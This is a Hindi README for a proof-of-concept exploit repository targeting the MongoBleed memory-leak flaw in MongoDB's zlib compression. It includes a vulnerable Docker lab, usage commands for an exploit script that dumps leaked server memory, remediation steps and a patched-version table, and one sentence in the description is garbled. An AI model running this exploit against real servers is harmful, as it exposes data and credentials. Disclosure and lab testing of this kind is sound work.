
CVE-2025-14847 MongoBleed - MongoDB मेमोरी लीक भेद्यता PoC
👨💻 लेखक: Furkan KAYAPINAR (@FurkanKAYAPINAR)
⚠️ केवल शैक्षिक उद्देश्य
MongoDB सर्वर में महत्वपूर्ण बिना प्रमाणीकरण के मेमोरी-लीक भेद्यता के लिए प्रयोगशाला वातावरण और शोषण स्क्रिप्ट।
CVE-2025-14847 (MongoBleed) MongoDB सर्वर के zlib संपीड़न हैंडलिंग में एक महत्वपूर्ण बिना प्रमाणीकरण की मेमोरी-लीक भेद्यता है।
भेद्यता message_compressor_zlib.cpp में मौजूद है। OP_COMPRESSED संदेशों को संसाधित करते समय:
uncompressedSize के आधार पर बफर आवंटित करता हैलीक डेटा में शामिल हो सकता है:
# Clone repository
git clone https://github.com/FurkanKAYAPINAR/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB
# Create virtual environment
python3 -m venv venv
source venv/bin/activate # Linux/macOS
# venv\Scripts\activate # Windows
# Install dependencies
pip install -r requirements.txt
परीक्षण के लिए एक भेद्य MongoDB इंस्टेंस प्रारंभ करें:
cd lab
# Start vulnerable MongoDB (6.0.26 with zlib enabled)
docker-compose up -d
# Verify it's running
docker-compose ps
# Load sample data (optional)
./setup.sh load-data
# Stop lab
docker-compose down
# Single target
python exploit/mongobleed.py -u 127.0.0.1
# With specific port
python exploit/mongobleed.py -u 127.0.0.1 -p 27017
# Save leaked data to file
python exploit/mongobleed.py -u 127.0.0.1 -o leaked_data.bin
# Multiple iterations for more data
python exploit/mongobleed.py -u 127.0.0.1 -i 20
# Quiet mode (less output)
python exploit/mongobleed.py -u 127.0.0.1 -q
# Without hex dump (text output)
python exploit/mongobleed.py -u 127.0.0.1 --text
# Update to patched version
# Example for MongoDB 6.x
sudo apt-get update
sudo apt-get install mongodb-org=6.0.27
# Start mongod without zlib
mongod --networkMessageCompressors snappy,zstd
# Or in mongod.conf
net:
compression:
compressors: snappy,zstd
python remediation/verify_fix.py --target 127.0.0.1 --port 27017
🚨 चेतावनी
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
- कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है
- आप अपने कार्यों के लिए पूरी तरह जिम्मेदार हैं
- लेखक दुरुपयोग के लिए कोई देयता नहीं लेते हैं
इस उपकरण का उपयोग करके, आप सहमत हैं कि आपके पास लक्ष्य प्रणालियों का परीक्षण करने का उचित प्राधिकरण है।
योगदान का स्वागत है! कृपया पहले CONTRIBUTING.md पढ़ें।
यह परियोजना MIT लाइसेंस के तहत लाइसेंस प्राप्त है - LICENSE फ़ाइल देखें।
| गुण | मान |
|---|
| CVE ID | CVE-2025-14847 |
| CVSS स्कोर | 8.7 (उच्च) |
| हमला वेक्टर | नेटवर्क |
| प्रमाणीकरण | कोई आवश्यक नहीं |
| प्रकटीकरण तिथि | 19 दिसंबर, 2025 |
| संस्करण श्रेणी | पैच किया गया संस्करण |
|---|
| 8.2.0 - 8.2.2 | 8.2.3 |
| 8.0.0 - 8.0.16 | 8.0.17 |
| 7.0.0 - 7.0.26 | 7.0.28 |
| 6.0.0 - 6.0.26 | 6.0.27 |
| 5.0.0 - 5.0.31 | 5.0.32 |
| 4.4.0 - 4.4.29 | 4.4.30 |
| All 4.2, 4.0, 3.6 | EOL - तुरंत अपग्रेड करें |